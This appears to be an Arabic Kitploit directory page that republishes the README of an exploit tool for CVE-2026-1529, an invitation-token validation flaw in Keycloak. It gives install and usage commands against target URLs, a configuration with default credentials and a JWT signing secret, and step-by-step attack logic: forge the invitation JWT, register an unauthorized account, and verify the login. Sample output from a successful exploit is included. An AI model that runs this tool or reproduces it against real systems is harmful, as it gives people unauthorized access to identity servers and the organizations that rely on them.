Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1529 — Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة | Kitploit
أدوات/GitHubGitHub/0x240x23elu/cve-2026-1529
المصادقة والترخيصتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة

عرض المستودع
6217منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال ثغرة CVE-2026-1529 في Keycloak

Python Version License Status

CVE-2026-1529: Keycloak - تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة

⚠️ تحذير: هذه الأداة مخصصة لأغراض الاختبار الأمني التعليمي والمصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

📋 جدول المحتويات

  • نظرة عامة
  • الميزات
  • المتطلبات الأساسية
  • التثبيت
  • الاستخدام
  • الإعدادات
  • كيفية العمل
  • المخرجات
  • استكشاف الأخطاء وإصلاحها
  • إخلاء المسؤولية القانوني
  • المساهمة
  • الاعتمادات

🎯 نظرة عامة

توضح هذه الأداة ثغرة أمنية حرجة في Keycloak (CVE-2026-1529) تسمح بتسجيل مؤسسة غير مصرح به من خلال التحقق غير السليم من رمز دعوة JWT. يقوم الاستغلال بالتلاعب برموز الدعوة للحصول على وصول غير مصرح به إلى مثيلات Keycloak.

تفاصيل الثغرة:

  • معرف CVE: CVE-2026-1529
  • الخطورة: حرجة
  • متجه الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الأنظمة المتأثرة: مثيلات Keycloak مع ميزة دعوة المؤسسات

✨ الميزات

  • ✅ اكتشاف تلقائي للثغرات
  • ✅ التلاعب برموز JWT
  • ✅ تسجيل مستخدم تلقائي
  • ✅ التحقق من تسجيل الدخول
  • ✅ تقارير استغلال مفصلة
  • ✅ معلمات قابلة للتكوين
  • ✅ دعم تسجيل التصحيح
  • ✅ عميل HTTP متعدد المحاولات

📦 المتطلبات الأساسية

  • Python 3.7 أو أحدث
  • pip (مدير حزم Python)
  • بيئة افتراضية (موصى بها)
  • مثيل Keycloak مستهدف (لأغراض الاختبار المصرح به فقط)

🚀 التثبيت

الطريقة 1: استنساخ المستودع

# استنساخ المستودع
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate  # على Windows: venv\Scripts\activate

# تثبيت التبعيات
pip install -r requirements.txt

الطريقة 2: الإعداد اليدوي

# إنشاء هيكل الدليل
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# تنزيل الملفات من الإصدارات أو نسخها يدويًا
# ثم تثبيت التبعيات
pip install requests urllib3 PyJWT

هيكل الملفات

keycloak-exploit/
├── keycloak-exploit.py           # سكربت الاستغلال الرئيسي
├── requirements.txt              # تبعيات Python
├── README.md                     # هذا الملف
├── config/
│   └── default_config.json       # ملف الإعدادات
├── utils/
│   ├── __init__.py              # مُهيئ الحزمة
│   ├── http_utils.py            # أدوات عميل HTTP
│   ├── jwt_utils.py             # التلاعب بـ JWT
│   └── crypto_utils.py          # أدوات التشفير
├── logs/                         # سجلات مولدة تلقائيًا
└── output/
    └── reports/                  # تقارير الاستغلال

💻 الاستخدام

الاستخدام الأساسي

python3 keycloak-exploit.py https://target-keycloak.com

الخيارات المتقدمة

# مع رمز دعوة مخصص
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# مع معرف مؤسسة مخصص
python3 keycloak-exploit.py -o custom_org_id https://target.com

# مع ملف إعدادات مخصص
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# تفعيل تسجيل التصحيح
python3 keycloak-exploit.py -d https://target.com

# عرض المساعدة
python3 keycloak-exploit.py -h

# عرض الإصدار
python3 keycloak-exploit.py -v

وسائط سطر الأوامر

الوسيطالاختصارالوصف
target-عنوان URL المستهدف لـ Keycloak (مطلوب)
--token-tرمز دعوة مخصص
--org-id-oمعرف مؤسسة مخصص
--config-cمسار ملف الإعدادات
--debug-dتفعيل تسجيل التصحيح
--version-vعرض معلومات الإصدار
--help-hعرض رسالة المساعدة

⚙️ الإعدادات

قم بتحرير config/default_config.json لتخصيص معلمات الاستغلال:

{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

خيارات الإعدادات

القسمالمعلمةالوصفالافتراضي
exploitdefault_usernameاسم المستخدم للتسجيلadmin_user_2026
exploitdefault_passwordكلمة المرور للتسجيلKeycloakCVE2026!
exploitdefault_emailالبريد الإلكتروني للتسجيل[email protected]
exploittimeoutمهلة طلب HTTP (بالثواني)30
exploitmax_retriesالحد الأقصى لمحاولات HTTP3
jwtalgorithmخوارزمية توقيع JWTHS256
jwtsecret_keyالمفتاح السري لـ JWTمخصص
jwttoken_expiryانتهاء صلاحية الرمز (بالثواني)3600

🔧 كيفية العمل

يعمل الاستغلال بالخطوات التالية:

  1. فحص الثغرة

    • الاتصال بمثيل Keycloak المستهدف
    • اكتشاف إصدار Keycloak
    • اختبار نقاط نهاية المؤسسات
  2. توليد/التلاعب بالرمز

    • توليد أو قبول رمز الدعوة
    • فك تشفير رمز JWT
    • التلاعب بمعرف المؤسسة في الحمولة
    • إعادة توقيع الرمز بمفتاح معروف
  3. تسجيل المستخدم

    • إرسال التسجيل بالرمز المتلاعب به
    • تجاوز التحقق من المؤسسة
    • إنشاء حساب مستخدم غير مصرح به
  4. التحقق من تسجيل الدخول

    • اختبار تسجيل الدخول ببيانات الاعتماد المُنشأة
    • توليد رمز الوصول
    • توفير رابط تسجيل الدخول
  5. توليد التقرير

    • إنشاء تقرير استغلال مفصل
    • الحفظ في output/reports/
    • يتضمن جميع التفاصيل الفنية

مخطط تدفق الهجوم

┌─────────────────┐
│  فحص الهدف      │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  توليد/الحصول   │
│  على الرمز      │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ التلاعب بالرمز  │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ تسجيل المستخدم  │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ اختبار الدخول   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ توليد التقرير   │
└─────────────────┘

📊 المخرجات

مخرجات الاستغلال الناجح

============================================================
نتائج استغلال CVE-2026-1529
============================================================
✓ الهدف عرضة لثغرة CVE-2026-1529

🎯 الاستغلال ناجح!
اسم المستخدم: admin_user_2026
كلمة المرور: KeycloakCVE2026!
البريد الإلكتروني: [email protected]
رابط تسجيل الدخول: https://target.com/realms/master/account

📄 تم حفظ التقرير في: output/reports/exploit_report_20260211_050507.txt

🔐 استخدم بيانات الاعتماد المقدمة للوصول إلى مثيل Keycloak!
⚠️ هذا يوضح الوصول غير المصرح به بسبب CVE-2026-1529

============================================================
بواسطة f3ds cr3w est, 2002
============================================================

التقرير المُنشأ

يتم حفظ تقرير مفصل في output/reports/ يتضمن:

  • معلومات الهدف
  • نتائج الاستغلال لكل خطوة
  • بيانات اعتماد المستخدم المُنشأ
  • رابط تسجيل الدخول
  • الرموز الأصلية والمتلاعب بها
  • التفاصيل الفنية
  • معلومات CVE
  • التوصية الأمنية

ملفات السجل

يتم حفظ السجلات في دليل logs/ مع معلومات تنفيذ مفصلة.

🐛 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

1. ModuleNotFoundError: No module named 'utils'

الحل:

# تأكد من أنك في الدليل الصحيح
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com

2. ملف الإعدادات غير موجود

الحل:

# تأكد من وجود دليل config
mkdir -p config
# انسخ أو أنشئ default_config.json في config/

3. Retry.init() got an unexpected keyword argument 'method_whitelist'

تنزيل الأداة